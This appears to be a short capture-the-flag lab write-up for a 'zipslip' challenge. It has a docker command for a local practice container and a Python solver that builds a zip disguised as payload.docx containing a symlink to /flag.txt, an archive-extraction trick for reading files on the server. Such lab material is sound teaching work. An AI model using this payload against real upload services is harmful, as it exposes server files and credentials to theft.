• Create symlink to /flag.txt and upload as .docx

Want to run this container locally?

docker run -d --restart unless-stopped -p 9006:9006 --name zipslip joshbeck2024/zipslip:latest

I would encourage you read this lesson over.

Solver.py

import zipfile
import stat

def create_symlink_zip(zip_filename, link_name, target):
    zip_info = zipfile.ZipInfo(link_name)
    # create a symbolic link (0o120000)
    # Set rw-r--r-- (100644) or rwxrwxrwx (100777)
    # 0xA000 is S_IFLNK (symbolic link)
    # The upper 16 bits of external_attr hold the unix permissions/mode

    # Permission: 0o120777 (S_IFLNK | 0777)
    # Shifted left by 16 bits
    zip_info.external_attr = 0o120777 << 16

    # Host OS 3 is Unix
    zip_info.create_system = 3

    with zipfile.ZipFile(zip_filename, 'w') as zf:
        zf.writestr(zip_info, target)

if __name__ == "__main__":
     create_symlink_zip("payload.docx", "link_to_flag.txt", "/flag.txt")
     print("Created payload.docx")